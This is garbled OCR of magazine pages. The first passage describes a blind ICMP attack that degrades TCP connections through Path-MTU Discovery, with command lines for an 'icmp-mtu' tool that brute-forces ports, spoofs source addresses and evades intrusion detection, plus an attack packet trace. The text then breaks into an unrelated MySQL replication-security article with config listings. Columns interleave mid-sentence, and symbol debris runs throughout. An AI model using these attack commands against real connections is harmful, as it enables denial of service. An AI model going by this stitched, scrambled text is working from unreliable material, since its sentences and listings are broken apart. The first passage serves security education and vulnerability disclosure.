Figure 4. IP fragmentation
1024-4999). While this range usu-
ally varies among different imple-
��������� mentations, an attacker could easily
identify the operating system being
used by the client by means of an
OS detection tool such as Nmap or
queso. With that information, the at-
������ tacker could simply look up the port
number range used for ephemeral
ports by that implementation from
publicly available documentation
������
(e.g. see the references section).
Thus, the attacker would need to
try only those port numbers that lie
within the range from which the cli-
ent’s operating system may choose
��������
an ephemeral port.
It is interesting to note that
�������� a large number of TCP implementa-
tions choose ephemeral ports from
port ranges of only 4000 values or
Figure 5. Interconnection of heterogeneous networks so. In such cases, an attacker con-
nected to the Internet by means of TCP connection and/or the systems specifically for testing this attack.
a 128kbps link could perform the involved in the handling of the small The icmp-mtu tool has a variety of
attack (trying all the possible values packets. options, which allow the attacker to
for the client port) in only 10 seconds The applications that will be configure each of the parameters
(approximately). most affected are those which de- of the attack (such as the Next-Hop
pend on high data transfer rates MTU), as well as a number of other
Impact of the Attack and/or good performance for their values that, while not directly related
As mentioned before, the attack correct operation. One example of to the attack technique, could help to
against the Path-MTU Discovery such an application is BGP (Border evade network intrusion detection (or
mechanism causes a notable re- Gateway Protocol). The successful prevention) systems. However, for
duction in the size of the packets exploitation of the attack described space considerations, this article will
that are sent to the attacked con- in this article in some scenarios explain only the most basic options
nection. This will have at least two could, lead to inconsistencies in of the icmp-mtu tool.
negative effects. First, given that the routing tables of the involved As we mentioned in our expla-
the ration information/headers will BGP peers with the potential of af- nation of the Path-MTU Discovery
be reduced, more bandwidth will be fecting all those networks whose mechanism, after 10 minutes of
wasted for the transfer of protocol reach ability depends on the routing discovering the Path-MTU of the
headers. Secondly, a reduction in information exchanged by the BGP connection, TCP will try to increase
the packet size will generally lead peers involved in the attacked TCP the size of the segments it sends
to an increase in the packet-rate, connection. to check whether the Path-MTU
as more packets will be needed In case that target of the attack has increased. This means that,
to transfer the same amount of were a TCP connection being used even if the attacker performs the
information over the same period by protocols such as FTP or HTTP, attack successfully and causes the
of time. In most systems, there is the CPU utilization of the involved Path-MTU of the connection to be
a direct relationship between the systems could be increased, de- reduced, after ten minutes he will
packet-rate and the interrupt re- grading the performance of the data have to perform the attack again,
quest (IRQ) rate, as each received transfer and, in some extreme cases as the size of the packets sent for
packet causes an interrupt request. a denial of service (DoS) condition the connection might have been in-
Thus, the increase in the packet- might occur. creased. Thus, in order to keep the
rate will usually lead to an increase size of the packets of the attacked
in the IRQ rate, which in turn will Attacking connection small, he will have to
cause an increase in the CPU load a TCP Connection send ICMP fragmentation needed
of the involved systems. These two In order to perform the attack, we will and DF bit set error messages in
effects could possibly affect the ap- employ the icmp-mtu tool that was case the size of the packets of the
plication making use of the attacked coded by the author of this article connection has been increased, it
is reduced again. This is the reason
for which, once executed, the icmp-
��������� mtu tool will continue sending ICMP
fragmentation needed and DF bit set
error messages until it is interrupted
(e.g. by means of [CTRL]+[C ] key
combination).
������ Figure 1 shows a possible sce-
nario for the attack discussed in this
article, in which a web browser has
�������������������� established a TCP connection with
������ ����������������� a web server. We can see that the
attacker is located off the path that
the packets that belong to the con-
nection follow. Let’s assume that
the client is downloading a large file
��������
from the web server, such that there
will be enough time for the attacker
�������� to perform the attack against this
TCP connection. In this scenario,
the attacker would know the follow-
Figure 6. Operation of the Path-MTU Discovery mechanism ing information about the target TCP
connection: client IP address and The attacker will choose the target for the client side (and hence the
server IP address (as we assume of the attack to be the sending side number of spoofed packets to send)
that the attacker knows the two of the connection. Therefore, in our will be much smaller.
systems that have established the example the target of the spoofed By default, icmp-mtu sets the
connection to be attacked) and the ICMP error messages will be the source address of the ICMP error
TCP port number used by the server web server. The icmp-mtu tool will messages to the IP address of the
for this connection (as we assume repeatedly send the 65536 packets host that is not being attacked.
the attacker knows which service is that are necessary to try all the That is, in the previous examples
being used by the client). possible port numbers that the cli- the source address of the ICMP
Only with this information, the at- ent could use for the target TCP error messages would be set to
tacker could try to perform the attack connection, until it is interrupted 192.168.0.1. However, the ICMP
using the icmp-mtu tool as follows: (e.g. by means of the [CTRL]+[C ] error messages do not need to
key combination). have any particular source ad-
icmp-mtu -c 192.168.0.1 -s 172.16.0.1: Let’s suppose that the attacker dress, as any intermediate router
80 -t server knew the operating system being could legitimately signal an error
used by the client. For example, condition.
The -c option allows the user to the attacker could get this informa- The -f option of the icmp-mtu
specify the client IP address and tion by means of an operating sys- tool allows the user to specify
TCP port number. In this example, tem detection tool such as Nmap the source address of the forged
the attacker specifies only the IP (http://www.insecure.org). With this ICMP error messages. This could
address, as he does not know the information, the attacker would be particularly useful in case some
ephemeral port number used by the know the ephemeral port number intermediate router is performing
client (i.e. the web browser). As the range used by the client. For exam- egress-filtering (i.e. it is filtering
client port number is left unspeci- ple, if the operating system being packets based on their source IP
fied, the icmp-mtu tool will perform used by the client is Microsoft Wid- address), thus preventing the forged
a brute force attack, trying all the ows, the attacker would know that ICMP error messages from reach-
port numbers in the range 0-65535. the ephemeral port number range ing the target host.
The -s option is used to specify the used by the client is 1024-4999. Let’s suppose that the attacker
server IP address and TCP port With this information in mind, the wanted to set the source address
number. In our example, as the cli- attacker could run the icmp-mtu tool of the ICMP error messages to
ent knows both the IP address and as follows: 102.168.0.1. In that case, he could
the TCP port number used by the run the icmp-mtu tool as follows:
server for this connection, he will icmp-mtu -c 192.168.0.1:1024-4999 -s
specify them both. Finally, the -t 172.16.0.1:80 -t server icmp-mtu -c 192.168.0.1:1024-4999 -s
option specifies which endpoint of 172.16.0.1:80 -f 192.168.0.1 -t server
the TCP connection (the client or In this case the attacker specified
the server) should be the target of a port number range for the client, In case the attacker wanted the
the spoofed ICMP error messages. the number of port numbers to try source address to be that of his own
� �������� ��
������������������������
�����������������������������
�������
����
system, he could instruct icmp-mtu Sending a large number of ICMP simply fail. Therefore, in cases in
to not forge the source address of error messages in a short period of which an attack would lead to a large
the spoofed ICMP error messages time could lead to congestion in some number of packets being sent to the
by means of the -n option: of the involved networks or systems. target host, the attacker will usually
Furthermore, it could result in an ICMP want to limit the bandwidth used by
icmp-mtu -c 192.168.0.1:1024-4999 -s traffic rate higher than the accepted the icmp-mtu tool. The -r option of
172.16.0.1:80 -n -t server threshold at the involved systems. the icmp-mtu tool allows the user to
All these conditions would usually limit the bandwidth used for the at-
Thus, the source address of the lead to packet drops at the congested tack, in kilobits per second (kbps). For
ICMP error messages would be that systems or networks. Furthermore, in example, if the attacker wants to limit
of the attacker’s host. Obviously, in case the ICMP error message that the bandwidth to 56 kbps, he could
order to avoid being easily tracked would actually cause the size of the execute icmp-mtu as follows:
down, the attacker will usually avoid packets to be reduced (i.e. the error
using his own IP address for per- message with the correct four-tuple) icmp-mtu -c 192.168.0.1:1024-4999 -s
forming the attack. were dropped, the attack would 172.16.0.1:80 -r 56 -t server
Listing 1a. Packet trace of an attack against the Path-MTU Discovery mechanism
07:33:33.450711 172.16.0.1.80 > 192.168.0.1.3028: . 55381:56801(1420) ack 0 win 17040 (DF) (ttl 64, id 46716)
07:33:33.766220 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 48281 win 9940 (DF) (ttl 117, id 55756)
07:33:33.766241 172.16.0.1.80 > 192.168.0.1.3028: . 56801:58221(1420) ack 0 win 17040 (DF) (ttl 64, id 64806)
07:33:33.770295 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 49701 win 9940 (DF) (ttl 117, id 55758)
07:33:33.770318 172.16.0.1.80 > 192.168.0.1.3028: . 58221:59641(1420) ack 0 win 17040 (DF) (ttl 64, id 37411)
07:33:34.203906 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 51121 win 9940 (DF) (ttl 117, id 55760)
07:33:34.203962 172.16.0.1.80 > 192.168.0.1.3028: . 59641:61061(1420) ack 0 win 17040 (DF) (ttl 64, id 49486)
07:33:34.378908 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 52541 win 9940 (DF) (ttl 117, id 55761)
07:33:34.378933 172.16.0.1.80 > 192.168.0.1.3028: . 61061:62481(1420) ack 0 win 17040 (DF) (ttl 64, id 54369)
07:33:34.429296 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 53961 win 9940 (DF) (ttl 117, id 55762)
07:33:34.429318 172.16.0.1.80 > 192.168.0.1.3028: . 62481:63901(1420) ack 0 win 17040 (DF) (ttl 64, id 38867)
07:33:34.769519 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 55381 win 9940 (DF) (ttl 117, id 55764)
07:33:34.769565 172.16.0.1.80 > 192.168.0.1.3028: . 63901:65321(1420) ack 0 win 17040 (DF) (ttl 64, id 45655)
07:33:35.110200 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 56801 win 9940 (DF) (ttl 117, id 55765)
07:33:35.110259 172.16.0.1.80 > 192.168.0.1.3028: . 65321:66741(1420) ack 0 win 17040 (DF) (ttl 64, id 47463)
07:33:35.113291 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 58221 win 9940 (DF) (ttl 117, id 55766)
07:33:35.113314 172.16.0.1.80 > 192.168.0.1.3028: . 66741:68161(1420) ack 0 win 17040 (DF) (ttl 64, id 52075)
07:33:35.510370 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 59641 win 9940 (DF) (ttl 117, id 55769)
07:33:35.510393 172.16.0.1.80 > 192.168.0.1.3028: . 68161:69581(1420) ack 0 win 17040 (DF) (ttl 64, id 50555)
07:33:35.687634 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 61061 win 9940 (DF) (ttl 117, id 55770)
07:33:35.687656 172.16.0.1.80 > 192.168.0.1.3028: . 69581:71001(1420) ack 0 win 17040 (DF) (ttl 64, id 61555)
07:33:36.009372 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 62481 win 9940 (DF) (ttl 117, id 55771)
07:33:36.009398 172.16.0.1.80 > 192.168.0.1.3028: . 71001:72421(1420) ack 0 win 17040 (DF) (ttl 64, id 34296)
07:33:36.180815 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 63901 win 9940 (DF) (ttl 117, id 55773)
07:33:36.180873 172.16.0.1.80 > 192.168.0.1.3028: . 72421:73841(1420) ack 0 win 17040 (DF) (ttl 64, id 53575)
07:33:36.506718 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 65321 win 9940 (DF) (ttl 117, id 55774)
07:33:36.506743 172.16.0.1.80 > 192.168.0.1.3028: . 73841:75261(1420) ack 0 win 17040 (DF) (ttl 64, id 34721)
07:33:36.510804 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 66741 win 9940 (DF) (ttl 117, id 55775)
07:33:36.510827 172.16.0.1.80 > 192.168.0.1.3028: . 75261:76681(1420) ack 0 win 17040 (DF) (ttl 64, id 34894)
07:33:37.004635 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 68161 win 9940 (DF) (ttl 117, id 55777)
07:33:37.004695 172.16.0.1.80 > 192.168.0.1.3028: . 76681:78101(1420) ack 0 win 17040 (DF) (ttl 64, id 44036)
07:33:37.008756 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 69581 win 9940 (DF) (ttl 117, id 55778)
07:33:37.008779 172.16.0.1.80 > 192.168.0.1.3028: . 78101:79521(1420) ack 0 win 17040 (DF) (ttl 64, id 47291)
07:33:37.213783 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 71001 win 9940 (DF) (ttl 117, id 55779)
07:33:37.213844 172.16.0.1.80 > 192.168.0.1.3028: . 79521:80941(1420) ack 0 win 17040 (DF) (ttl 64, id 37137)
07:33:37.222434 192.168.0.1 > 172.16.0.1: icmp: 192.168.0.1 unreachable – need to frag (mtu 296) (ttl 232, id 5693)
07:33:37.222472 172.16.0.1.80 > 192.168.0.1.3028: . 71001:71257(256) ack 0 win 17040 (DF) (ttl 64, id 58749)
07:33:37.222578 172.16.0.1.80 > 192.168.0.1.3028: . 71257:71513(256) ack 0 win 17040 (DF) (ttl 64, id 51033)
07:33:37.222845 172.16.0.1.80 > 192.168.0.1.3028: . 71513:71769(256) ack 0 win 17040 (DF) (ttl 64, id 32798)
07:33:37.223118 172.16.0.1.80 > 192.168.0.1.3028: . 71769:72025(256) ack 0 win 17040 (DF) (ttl 64, id 41766)
07:33:37.778893 192.168.0.1 > 172.16.0.1: icmp: 192.168.0.1 unreachable – need to frag (mtu 296) (ttl 221, id 2124)
07:33:37.778917 172.16.0.1.80 > 192.168.0.1.3028: . 71001:71257(256) ack 0 win 17040 (DF) (ttl 64, id 36548)
07:33:37.779022 172.16.0.1.80 > 192.168.0.1.3028: . 71257:71513(256) ack 0 win 17040 (DF) (ttl 64, id 61732)
07:33:37.779290 172.16.0.1.80 > 192.168.0.1.3028: . 71513:71769(256) ack 0 win 17040 (DF) (ttl 64, id 51438)
07:33:37.779563 172.16.0.1.80 > 192.168.0.1.3028: . 71769:72025(256) ack 0 win 17040 (DF) (ttl 64, id 40154)
Thus, the flow of forged ICMP error Packet Trace the TCP segments sent by the web
messages would be limited to an av- of a Real Attack server carries at most 256 bytes
erage bandwidth of 56 kbps. Listing 1 illustrates the output from of data. These 256 data bytes (to-
By default, the forged ICMP er- tcpdump with the results from the gether with the 20-bytes IP header
ror messages will advertise a Next- attack sketched in Figure 1. In and the 20-bytes TCP header)
Hop MTU of 68 bytes, as this is the the figure, the text in black cor- result in 296-bytes IP packets (the
minimum MTU as specified by the responds to the TCP segments packet size advertised in the Next-
IPv4 specifications. However, the sent by the client, while the text in Hop MTU field of the forged ICMP
attacker is free to choose some dif- blue corresponds to the TCP seg- error message).
ferent value for the Next-Hop MTU ments sent by the server. Finally, A few clarifications must be
field. the forged ICMP error message made about Listing 1. First, we can
The -m option of the icmp-mtu is highlighted in red. As we can see in the figure that the attacker
tool allows the attacker to specify the see from the first few lines, the sends a single ICMP error mes-
value to which the Next-Hop MTU web server was transferring data sage with the correct four-tuple
field of the ICMP error messages to the web browser in blocks of (Source Address, Source Port,
should be set. For example, if the 1420 bytes of data. The client was Destination Address, Destination
attacker wanted to advertise a Next- simply acknowledging the receipt Port), instead of trying all the pos-
Hop MTU of 296, he could run the of this data. sible client port numbers by brute
icmp-mtu tool as follows: At some point, the attacker force. Actually, all those packets
performs the attack described in corresponding to failed attack at-
icmp-mtu -c 192.168.0.1:1024-4999 -s this article by sending an ICMP tempts were removed from the tcp-
172.16.0.1:80 -t server -m 296 fragmentation needed and DF bit dump packet trace for the sake of
set error message that advertises clarity. Secondly, we can see that
Specifying Next-Hop MTU values a Next-Hop MTU of 296 bytes. As the attacker advertises a Next-
other than 68 might be useful to a result, the web server reduces Hop MTU of 296 bytes, rather than
avoid some NIDS (Network Intrusion the size of the packets it sends. We 68 bytes (the minimum IPv4 MTU).
Detection System) that would detect can see in the figure that once the The reason for this is that before
the attack. attack has been performed, each of launching the attack, an attacker
Listing 1b. Packet trace of an attack against the Path-MTU Discovery mechanism
07:33:37.804726 172.16.0.1.80 > 192.168.0.1.3028: . 72421:72677(256) ack 0 win 17040 (DF) (ttl 64, id 59091)
07:33:37.804701 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 72421 win 9940 (DF) (ttl 117, id 55782)
07:33:37.804829 172.16.0.1.80 > 192.168.0.1.3028: . 72677:72933(256) ack 0 win 17040 (DF) (ttl 64, id 53746)
07:33:37.805098 172.16.0.1.80 > 192.168.0.1.3028: . 72933:73189(256) ack 0 win 17040 (DF) (ttl 64, id 48719)
07:33:37.805371 172.16.0.1.80 > 192.168.0.1.3028: . 73189:73445(256) ack 0 win 17040 (DF) (ttl 64, id 37796)
07:33:38.000265 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 73841 win 9940 (DF) (ttl 117, id 55783)
07:33:38.000287 172.16.0.1.80 > 192.168.0.1.3028: . 73841:74097(256) ack 0 win 17040 (DF) (ttl 64, id 65040)
07:33:38.000391 172.16.0.1.80 > 192.168.0.1.3028: . 74097:74353(256) ack 0 win 17040 (DF) (ttl 64, id 50520)
07:33:38.000660 172.16.0.1.80 > 192.168.0.1.3028: . 74353:74609(256) ack 0 win 17040 (DF) (ttl 64, id 37744)
07:33:38.000933 172.16.0.1.80 > 192.168.0.1.3028: . 74609:74865(256) ack 0 win 17040 (DF) (ttl 64, id 49194)
07:33:38.001205 172.16.0.1.80 > 192.168.0.1.3028: . 74865:75121(256) ack 0 win 17040 (DF) (ttl 64, id 35292)
07:33:38.001478 172.16.0.1.80 > 192.168.0.1.3028: . 75121:75377(256) ack 0 win 17040 (DF) (ttl 64, id 35405)
07:33:38.001751 172.16.0.1.80 > 192.168.0.1.3028: . 75377:75633(256) ack 0 win 17040 (DF) (ttl 64, id 50111)
07:33:38.002024 172.16.0.1.80 > 192.168.0.1.3028: . 75633:75889(256) ack 0 win 17040 (DF) (ttl 64, id 63637)
07:33:38.002297 172.16.0.1.80 > 192.168.0.1.3028: . 75889:76145(256) ack 0 win 17040 (DF) (ttl 64, id 37723)
07:33:38.099395 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 75261 win 9940 (DF) (ttl 117, id 55784)
07:33:38.099413 172.16.0.1.80 > 192.168.0.1.3028: . 76145:76401(256) ack 0 win 17040 (DF) (ttl 64, id 44236)
07:33:38.099518 172.16.0.1.80 > 192.168.0.1.3028: . 76401:76657(256) ack 0 win 17040 (DF) (ttl 64, id 58026)
07:33:38.099786 172.16.0.1.80 > 192.168.0.1.3028: . 76657:76913(256) ack 0 win 17040 (DF) (ttl 64, id 55844)
07:33:38.100058 172.16.0.1.80 > 192.168.0.1.3028: . 76913:77169(256) ack 0 win 17040 (DF) (ttl 64, id 53944)
07:33:38.295212 192.168.0.1.3028 > 172.16.0.1.80: . [tcp sum ok] ack 76681 win 9940 (DF) (ttl 117, id 55786)
07:33:38.295271 172.16.0.1.80 > 192.168.0.1.3028: . 77169:77425(256) ack 0 win 17040 (DF) (ttl 64, id 50067)
07:33:38.295377 172.16.0.1.80 > 192.168.0.1.3028: . 77425:77681(256) ack 0 win 17040 (DF) (ttl 64, id 50320)
07:33:38.295645 172.16.0.1.80 > 192.168.0.1.3028: . 77681:77937(256) ack 0 win 17040 (DF) (ttl 64, id 46302)
07:33:38.295918 172.16.0.1.80 > 192.168.0.1.3028: . 77937:78193(256) ack 0 win 17040 (DF) (ttl 64, id 35011)
07:33:38.296190 172.16.0.1.80 > 192.168.0.1.3028: . 78193:78449(256) ack 0 win 17040 (DF) (ttl 64, id 33938)
07:33:38.296463 172.16.0.1.80 > 192.168.0.1.3028: . 78449:78705(256) ack 0 win 17040 (DF) (ttl 64, id 34572)
07:33:38.296736 172.16.0.1.80 > 192.168.0.1.3028: . 78705:78961(256) ack 0 win 17040 (DF) (ttl 64, id 50867)
07:33:38.297009 172.16.0.1.80 > 192.168.0.1.3028: . 78961:79217(256) ack 0 win 17040 (DF) (ttl 64, id 49460)
07:33:38.297282 172.16.0.1.80 > 192.168.0.1.3028: . 79217:79473(256) ack 0 win 17040 (DF) (ttl 64, id 54046)
had detected that the server was performance-degrading attack sible to authenticate ICMP error
running the OpenBSD operating discussed in this article, hopefully messages by means of the TCP
system, which is known to ignore shedding some light on why this is MD5 option.
those ICMP error messages that the case. Another mechanism that is usu-
advertise a Next-Hop MTU smaller One of the authentication ally assumed to provide protection
than 296. Thus, the attacker de- mechanisms that are used exclu- against ICMP-based attacks is
cided to use a Next-Hop MTU of sively with TCP is the TCP MD5 IPSec. IPSec provides mecha-
296, as this is the smallest value option. This contains an MD5 nisms for the authentication of the
with which the attack can be suc- cryptographic signature of the packets that correspond to a TCP
cessfully performed. contents of the TCP segment. connection (IPSec transport mode).
When the option is enabled for a However, as ICMP error messages
Dismantling TCP connection, every segment can be sent by any intermediate
a Number of Myths sent for the connection will include router, in practice it is impossible
Once this vulnerability was disclosed an MD5 option, and each segment to authenticate ICMP errors by
in 2005, a discussion took place in a received for the connection will be means of IPSec. In order for such
number of public mailing lists about authenticated by re-computing its authentication to be possible, the
the possible counter-measures for MD5 signature (using a secret key host receiving the ICMP error mes-
this vulnerability. In most cases, the shared by both hosts). If the com- sage should have an IPSec Secu-
counter-measures proposed by the puted signature is different from rity Association with every router
mailing list subscribers were based the one included in the received that could potentially send an ICMP
on incorrect assumptions, assigning TCP segment, the offending seg- error message (something that is
to existing mechanisms (e.g. IPsec) ment will be dropped. Thus, the virtually impossible), or should be
security properties that they actually TCP MD5 option protects TCP able to establish an IPSec Security
did not have. As it seems confusion from any attack that requires the Association with any of them dy-
still remains in the community, this attacker to forge TCP segments. namically (which, considering the
section will provide an overview However, the MD5 option does low deployment level of protocols
of those mechanisms that do not not provide any protection against for dynamic establishment of IPSec
provide protection against the blind attacks based on forged ICMP er- Security Associations, is also virtu-
ror messages. On the one hand ally impossible). In this respect, the
the IETF specification of the TCP IPSec specification itself mentions
MD5 option does not even men- the problem of trying to authenti-
�� ���� �� ���
������ ������ ������ ������ tion ICMP error messages. On cate ICMP error messages, leav-
the other hand, only a piece of the ing the choice of what to do with
TCP segment that elicited the error unauthenticated ICMP errors to
�������������� is included in the ICMP payload, it the IPSec implementer or admin-
is impossible to re-compute the istrator. Therefore, IPSec does not
Figure 8. Structure of an IP
MD5 signature from that piece of necessarily protect TCP connec-
packet that encapsulates an ICMP
the packet embedded in the ICMP tions from the attack described in
error message elicited by a TCP
payload, and therefore it is impos- this article.
connection
� �������� ��
������������������������� ������������������������������
����������������������
��������
�����������������������������
�������� � � � � � �
������������
�������� � � � � � � ������������������
�������
� � � � � �
�������
������������������� ���������������������
�������
����
Difficulty
I
n cases such as this, part of the database is added daily. For example, system variables
sourced extentially to the co-operation part- like “auto_increment” for replication exist since
ner. This should be regarded as potentially MySQL version 5. Contrary to the commercially
insecure. Although data replication is in both available MySQL cluster and other databases
directions, it should secured so that data from like Oracle, which use a bidirectional connec-
the co-operation partner can’t alter important tion, MySQL is using two unidirectional con-
data in the central database. If deciding that the nections. As with the normal unidirectional
partner should only be allowed to update spe- replication mechanism, the two positions mas-
cific columns in a table, the administrator will ter and slave are used. The slave is the active
face a new challenges in according to MySQL part and connects to the master. If problems
history. We have to face the limitations that this occur during the setup phase the slave will wait
free database system has. This article was
written to describe how it’s possible for such a
scenario to occur with a focus on security best What you will learn...
practice.
• How to configure SSL encrypted dual-master
MySQL is available for both the Windows
replication with MySQL
and Linux platforms. It does not matter what
• How to restrict replication on column level with
operating system is used. This article de- MySQL
scribes MySQL installed on the Linux operating • How to secure the main database so that it is
system. For Windows based systems, only the not possible to alter data in the central data-
path variables have to be adapted. The path base, even if the other database got compro-
variables in this article are adjusted to Debian mised
Etch Linux, other distributions may use other
installation paths. What you should know ...
The replication mechanism with all its cur-
rently available features, has only been avail- • Basics in how to use Linux
able for a short time and new features are
a specific, configurable time and will (Also called relay log files). The SQL to update specific columns in a table.
then try again. In the case of a dual- thread reads the data from the relay The following section will explain
master database replication both log and executes them in the data- a complete scenario where these
database servers rotate their master base. This procedure is illustrated in specifications had to be fulfilled. The
/ slave positions. The advantage of Figure 1. scenario describes a security infor-
this concept is that existing master The binlog files, mentioned mation service from Siemens CERT
/ slave mechanisms only have to above, are the master's log files. (Computer Emergency Response
be modified slightly for dual-master All statements that alter data in the Team) which was partly developed
replicatio. The disadvantage of this, database, are stored in these files. by the author.
is that in some situations incon- An example of this is the UPDATE
sistencies can occur. For example, statements. Three different logging Scenario: Security
take a table that is available on two formats are available. First, there is Information Service
database systems and is replicated the statement-based logging (SBL), The Hack Proof Products team from
in both directions. The tables have which stores the complete state- Siemens CERT offers co-operation
an ID column as a primary key with ments in the log files. In contrast, the partners the possibility to register
the “auto _ increment" value. When a row-based logging (RBL) saves only their products including their com-
record is added in every instance at how the rows are affected. The third ponents in a MySQL database.
the same time, errors will show up mode is called mixed-based logging Afterwards a vulnerability search
during data replication because the (MBL) and is the default logging program looks for the new vulner-
ID would no longer be unique. This mode used since MySQL 5.1.8. MBL ability announcements in various
problem can be solved by setting uses SBL by default, but switches to on-line resources, like RSS feeds,
the variables auto-increment-incre- RBL in some situations. mailing lists, etc. Results that match
ment and auto-increment-offset. The I would like to mention some the registered components are au-
first variable allows you to adjust the constraints that were made - the tomatically stored in the database.
incrementation value and the sec- secondary database is only allowed Now, CERT employees rate these
ond one tells the server from which
number it should start to count. Both
variables can be found in the config- ������ �����
�
uration file my.cnf and should be set, ������ �
so that the two involved systems do ������
����� ����������
�����
not assign the same auto increment
��������
�
��������
results and provide the ordered and new value, so that there is no chance
rated information to the customers. that other people compromise the Listing 3. MySQL configuration
Partner companies have the possibil- database in the meantime. All these file
ity to add own comments, according steps are pointed out in Listing 1. If [client]
to their own systems. These com- this is a completely new installation of port = 3306
ments, and only these comments, the operating system, Apache, PHP socket = /var/run/mysqld/
are replicated back to the Siemens and php-mysql will probably have to mysqld.sock
[mysqld_safe]
CERT database. A schematic extract be installed as well, depending on
socket = /var/run/mysqld/
from the database is illustrated in your application. The administrator mysqld.sock
Figure 2. has the option to use phpmyadmin to nice = 0
Due to the fact, that this applica- configure MySQL database. Phpmy-
tion is fully integrated in the compa- admin is an easy to use web front-end [mysqld]
old_passwords = true # inserted by
nies' patch management process, for database administration. It should
debconf
security and high availability are be mentioned that phpmyadmin has user = mysql
mandatory. In the next sections I will set a limit of 1,5 megabytes for up- pid-file = /var/run/mysqld/
be explain how it is possible to fulfill all loading files. A further limit is set by mysqld.pid
mentioned requirements and where PHP which has configured a default socket = /var/run/mysqld/
mysqld.sock
MySQL's limits are reached. value for the variable max_file_size.
port = 3306
Alternatively, big files can be imported basedir = /usr
Basic setup using the console. datadir = /var/lib/mysql
After the successful installation of the After MySQL is installed and the tmpdir = /tmp
operation system, it has to be updated new root password is set, the data- language = /usr/share/mysql/
english
and the necessary software has to base can be imported or set up. If
skip-external-locking
be installed. The core of the project there is an already existing database, key_buffer = 16M
is MySQL, which can be installed it can be exported using the command max_allowed_packet = 16M
using the command apt-get install mysqldump -u root -p > dumpfile.sql thread_stack = 128K
mysql-server mysql-client. At first, the and imported on the new database thread_cache_size = 8
easier for the future use, the script in master-password are needed to log to the binary log files, mentioned
Listing 2 can be used. Please note the in on the master server. The vari- earlier in the article.
password and database variables that able replicate-wild-do-table is very
have to be adjusted according to your important in our scenario. With this Securing the
installation. The script itself needs the setting, the suitable criteria for SQL Replication Using SSL
path to the dump file as parameter. If statements are established. This To secure the database replica-
there is no database that already ex- means that the slave decides wheth- tion mechanism, MySQL is able to
ists, the new one can be built using er to replicate the statement from encrypt the channel by using SSL.
the command line or the phpmyadmin the master or not. The advantage in This protects against the attack-
web front-end. this approach is that the slave can ers sniffing the traffic and against
fully control which data is imported. man-in-the-middle attacks. The
Configuration of the The downside is that if the slave is in most common way to set up a fully
Replication Mechanism the co-operation partner's influence, functional SSL encryption is using
Configuring the replication is the it is left to the partner to change this OpenSSL from the Debian reposi-
next step after setting up and cus- setting and lower the restrictions. tory. With OpenSSL, it is easy to
tomizing MySQL. In Debian, the This can be a problem. Of course, create the necessary certificates
configuration file is located in /etc/ only the changes in tables get repli- to ensure communication integrity
mysql/my.cnf (see Listing 3). The cated and a potential attacker would and encryption, as shown in List-
first important variable to change is have to guess the correct tables ing 4. To exchange the SSL certifi-
server-id. To differentiate the both and columns to get the replication cates a USB stick or the program
servers the value has to be chosen done in the right way, but it is still a scp can be used. After deploying
adequately. With master_host the IP possible attack. At the time, there is the certificates three following val-
address of the master server can no chance to define restrictions on ues in my.cnf have to be adjusted:
be configured. The slave needs this master-side. Hopefully, MySQL will
information to establish the connec- change this in future releases. The ssl-ca=/etc/mysql/cacert.pem
tion for replication. Master-user and variable log-bin configures the path ssl-cert=/etc/mysql/server-cert.pem
# openssl req -new -keyout cakey.pem -out /etc/mysql/ssl/cacert.pem -config The paths point to the according
~/openssl/openssl.cnf
certificates that where generated.
# openssl req -new -keyout /etc/mysql/ssl/server-key.pem -out /etc/mysql/ssl/
On one server all the certificates are
server-req.pem -days 3600 -config ~/openssl/openssl.cnf installed, while the client certificates
# openssl rsa -in /etc/mysql/ssl/server-key.pem -out are located on the other side. The
/etc/mysql/ssl/server-key.pem # openssl ca -policy CA (certificate authority) certificate
policy_anything -out /etc/mysql/ssl/server-cert.pem \
has to be placed on both servers for
# -config ~/openssl/openssl.cnf -infiles /etc/mysql/ssl/
server-req.pem
it is needed to control the integrity of
# openssl req -new -keyout /etc/mysql/ssl/client-key.p em -out /etc/mysql/ the other certificates. In Listing 3 the
ssl/client-req.pem -days 3600 -config ~/openssl/ variable ssl-cipher = DHE-RSA-AES256-
openssl.cnf # openssl rsa -in /etc/mysql/ssl/client- SHA is commented out. It can be used
key.pem -out /etc/mysql/ssl/client-key.pem # openssl
to define a specific encryption algo-
ca -policy policy_anything -out /etc/mysql/ssl/client-
cert.pem \ # -config ~/openssl/openssl.cnf -infiles
rithm that has to be used. Generally,
/etc/mysql/ssl/client-req.pem it is a good idea to define one good
algorithm, so it is impossible for an
Listing 5. Configuring the slave attacker to switch to the weakest al-
gorithm in the list. Otherwise, chang-
stop slave;
change master to
ing this fixed value on all relevant
MASTER_HOST='192.168.103.1', servers, in case of a new vulnerabil-
MASTER_USER='sslreplicate', ity detected in the algorithm, means
MASTER_PASSWORD='slaveXp4sswd', also more administration efforts. It
MASTER_SSL=1,
is up to the administrator to decide
MASTER_SSL_CA='/etc/mysql/ssl/ca-cert.pem',
MASTER_SSL_CAPATH='/etc/mysql/ssl/',
which way to go. In this specific ex-
MASTER_SSL_CERT='/etc/mysql/ssl/client-cert.pem', ample, the variable was commented
MASTER_SSL_KEY='/etc/mysql/ssl/client-key.pem', out because no attacks on the imple-
MASTER_LOG_FILE='mysql-bin.000258', mentations were known at the time of
